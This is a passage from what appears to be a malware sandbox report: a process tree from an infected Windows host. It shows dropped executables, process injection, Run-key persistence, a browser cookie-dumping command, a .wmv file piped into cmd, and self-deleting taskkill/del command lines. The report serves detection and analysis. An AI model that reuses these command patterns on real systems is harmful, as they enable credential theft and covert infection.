                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5216
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:6004
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              7⤵
                                                                              • Loads dropped DLL
                                                                              PID:5968
                                                                          • C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe
                                                                            "C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4348
                                                                            • C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe
                                                                              "C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe"
                                                                              7⤵
                                                                                PID:4456
                                                                              • C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe
                                                                                "C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:4628
                                                                              • C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe
                                                                                "C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe"
                                                                                7⤵
                                                                                • Drops file in Drivers directory
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                PID:5560
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                  8⤵
                                                                                    PID:3992
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                      9⤵
                                                                                        PID:6112
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                      8⤵
                                                                                      • Enumerates system info in registry
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:5464
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffaa2924f50,0x7ffaa2924f60,0x7ffaa2924f70
                                                                                        9⤵
                                                                                          PID:5448
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1668 /prefetch:2
                                                                                          9⤵
                                                                                            PID:3816
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 /prefetch:8
                                                                                            9⤵
                                                                                              PID:4952
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1716 /prefetch:8
                                                                                              9⤵
                                                                                                PID:3804
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:1
                                                                                                9⤵
                                                                                                  PID:6136
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1
                                                                                                  9⤵
                                                                                                    PID:5356
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
                                                                                                    9⤵
                                                                                                      PID:4448
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
                                                                                                      9⤵
                                                                                                        PID:5144
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
                                                                                                        9⤵
                                                                                                          PID:4480
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
                                                                                                          9⤵
                                                                                                            PID:1352
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
                                                                                                            9⤵
                                                                                                              PID:4272
                                                                                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                              9⤵
                                                                                                                PID:5440
                                                                                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff65d9fa890,0x7ff65d9fa8a0,0x7ff65d9fa8b0
                                                                                                                  10⤵
                                                                                                                    PID:3960
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:8
                                                                                                                  9⤵
                                                                                                                    PID:2260
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
                                                                                                                    9⤵
                                                                                                                      PID:5612
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5836 /prefetch:8
                                                                                                                      9⤵
                                                                                                                        PID:4636
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1660,13618156075247466914,14860138543391835598,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2816 /prefetch:2
                                                                                                                        9⤵
                                                                                                                          PID:5704
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "cmd.exe" /C taskkill /F /PID 5560 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe"
                                                                                                                        8⤵
                                                                                                                          PID:836
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /F /PID 5560
                                                                                                                            9⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:4584
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "cmd.exe" /C taskkill /F /PID 5560 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\xulkA_8062xATPCjfuB8WTE3.exe"
                                                                                                                          8⤵
                                                                                                                            PID:4704
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /F /PID 5560
                                                                                                                              9⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:5528
                                                                                                                      • C:\Users\Admin\Documents\BnkuBMJrQqdihxStOEDTnWpO.exe
                                                                                                                        "C:\Users\Admin\Documents\BnkuBMJrQqdihxStOEDTnWpO.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:4352
                                                                                                                        • C:\Users\Admin\Documents\BnkuBMJrQqdihxStOEDTnWpO.exe
                                                                                                                          C:\Users\Admin\Documents\BnkuBMJrQqdihxStOEDTnWpO.exe
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4476
                                                                                                                      • C:\Users\Admin\Documents\utjB04h04yxU0_YUcJe7SQuX.exe
                                                                                                                        "C:\Users\Admin\Documents\utjB04h04yxU0_YUcJe7SQuX.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4296
                                                                                                                      • C:\Users\Admin\Documents\pe0wtSeqNM9O5Vij5xDkuQ9x.exe
                                                                                                                        "C:\Users\Admin\Documents\pe0wtSeqNM9O5Vij5xDkuQ9x.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4492
                                                                                                                      • C:\Users\Admin\Documents\rFLRwwp7eLiatz5iLohH4PJJ.exe
                                                                                                                        "C:\Users\Admin\Documents\rFLRwwp7eLiatz5iLohH4PJJ.exe"
                                                                                                                        6⤵
                                                                                                                          PID:4700
                                                                                                                          • C:\Users\Admin\Documents\rFLRwwp7eLiatz5iLohH4PJJ.exe
                                                                                                                            "C:\Users\Admin\Documents\rFLRwwp7eLiatz5iLohH4PJJ.exe"
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            PID:2080
                                                                                                                        • C:\Users\Admin\Documents\lifIa9FkuUuqS0ZA6bGwYAbP.exe
                                                                                                                          "C:\Users\Admin\Documents\lifIa9FkuUuqS0ZA6bGwYAbP.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:768
                                                                                                                          • C:\Users\Admin\Documents\lifIa9FkuUuqS0ZA6bGwYAbP.exe
                                                                                                                            "C:\Users\Admin\Documents\lifIa9FkuUuqS0ZA6bGwYAbP.exe"
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2972
                                                                                                                        • C:\Users\Admin\Documents\4ugRmftNIbnJ4YX8qkzmyV2A.exe
                                                                                                                          "C:\Users\Admin\Documents\4ugRmftNIbnJ4YX8qkzmyV2A.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:4908
                                                                                                                          • C:\Users\Admin\Documents\4ugRmftNIbnJ4YX8qkzmyV2A.exe
                                                                                                                            C:\Users\Admin\Documents\4ugRmftNIbnJ4YX8qkzmyV2A.exe
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:5444
                                                                                                                        • C:\Users\Admin\Documents\y810FN69FhdjiPrR0EpQDfim.exe
                                                                                                                          "C:\Users\Admin\Documents\y810FN69FhdjiPrR0EpQDfim.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:4740
                                                                                                                          • C:\Users\Admin\Documents\y810FN69FhdjiPrR0EpQDfim.exe
                                                                                                                            "C:\Users\Admin\Documents\y810FN69FhdjiPrR0EpQDfim.exe"
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4208
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                      4⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:2352
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_6.exe
                                                                                                                        sonia_6.exe
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Adds Run key to start application
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:2788
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3640
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          6⤵
                                                                                                                            PID:5052
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            6⤵
                                                                                                                              PID:1300
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              6⤵
                                                                                                                                PID:5024
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                            4⤵
                                                                                                                              PID:4060
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 544
                                                                                                                              4⤵
                                                                                                                              • Program crash
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3844
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                        1⤵
                                                                                                                        • Modifies registry class
                                                                                                                        PID:1408
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                        1⤵
                                                                                                                          PID:1232
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                          1⤵
                                                                                                                            PID:1192
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                            1⤵
                                                                                                                              PID:1056
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                              1⤵
                                                                                                                              • Drops file in System32 directory
                                                                                                                              PID:788
                                                                                                                              • C:\Users\Admin\AppData\Roaming\hcbtajg
                                                                                                                                C:\Users\Admin\AppData\Roaming\hcbtajg
                                                                                                                                2⤵
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                PID:4228
                                                                                                                              • C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:2544
                                                                                                                                • C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                  C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                  3⤵
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  PID:3504
                                                                                                                              • C:\Users\Admin\AppData\Roaming\hsbtajg
                                                                                                                                C:\Users\Admin\AppData\Roaming\hsbtajg
                                                                                                                                2⤵
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                PID:2700
                                                                                                                              • C:\Users\Admin\AppData\Roaming\hcbtajg
                                                                                                                                C:\Users\Admin\AppData\Roaming\hcbtajg
                                                                                                                                2⤵
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                PID:4636
                                                                                                                              • C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:2072
                                                                                                                                • C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                  C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                  3⤵
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  PID:2804
                                                                                                                              • C:\Users\Admin\AppData\Roaming\hsbtajg
                                                                                                                                C:\Users\Admin\AppData\Roaming\hsbtajg
                                                                                                                                2⤵
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                PID:5184
                                                                                                                              • C:\Users\Admin\AppData\Roaming\hcbtajg
                                                                                                                                C:\Users\Admin\AppData\Roaming\hcbtajg
                                                                                                                                2⤵
                                                                                                                                  PID:5552
                                                                                                                                • C:\Users\Admin\AppData\Roaming\hsbtajg
                                                                                                                                  C:\Users\Admin\AppData\Roaming\hsbtajg
                                                                                                                                  2⤵
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  PID:3676
                                                                                                                                • C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                  C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:5328
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                    C:\Users\Admin\AppData\Roaming\ivbtajg
                                                                                                                                    3⤵
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    PID:5944
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\hJIdyb\hJIdyb.dll",hJIdyb
                                                                                                                                  2⤵
                                                                                                                                  • Windows security modification
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  PID:5968
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                1⤵
                                                                                                                                  PID:1004
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:644
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                    2⤵
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:1996
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                    2⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:500
                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:3820
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:2920
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:5660
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:5468
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                  PID:5964
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3EF.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3EF.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:6044
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1FB5.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1FB5.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    PID:6076
                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                      cmd /c start c.exe & start l.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:2852
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c.exe
                                                                                                                                          c.exe
                                                                                                                                          3⤵
                                                                                                                                            PID:5108
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Parlasse.wmv
                                                                                                                                              4⤵
                                                                                                                                                PID:2076
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd
                                                                                                                                                  5⤵
                                                                                                                                                    PID:1320
                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                      findstr /V /R "^hqVLSBiFVkisDvgANWfHkkgqnFPqUPdvHQlUgqiIGEuNwqJAbhcZzXvwMVhhLiKuVLKNjzkNOHwGyBYbVfCGzdrKzoozMTXmTqRddWgreIkLVQWlWPacEtMEHZxtk$" Ove.wmv
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4188
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                        Puramente.exe.com m
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4628
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                          7⤵
                                                                                                                                                          • Drops startup file
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:3184
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                            8⤵
                                                                                                                                                              PID:388
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                              8⤵
                                                                                                                                                                PID:484
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4716
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping GFBFPSXA -n 30
                                                                                                                                                              6⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:2928
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\l.exe
                                                                                                                                                        l.exe
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5816
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2534.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\2534.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:4656
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 2534.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2534.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2508
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /im 2534.exe /f
                                                                                                                                                            3⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:4800
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            timeout /t 6
                                                                                                                                                            3⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:3356
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2A08.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\2A08.exe
                                                                                                                                                        1⤵
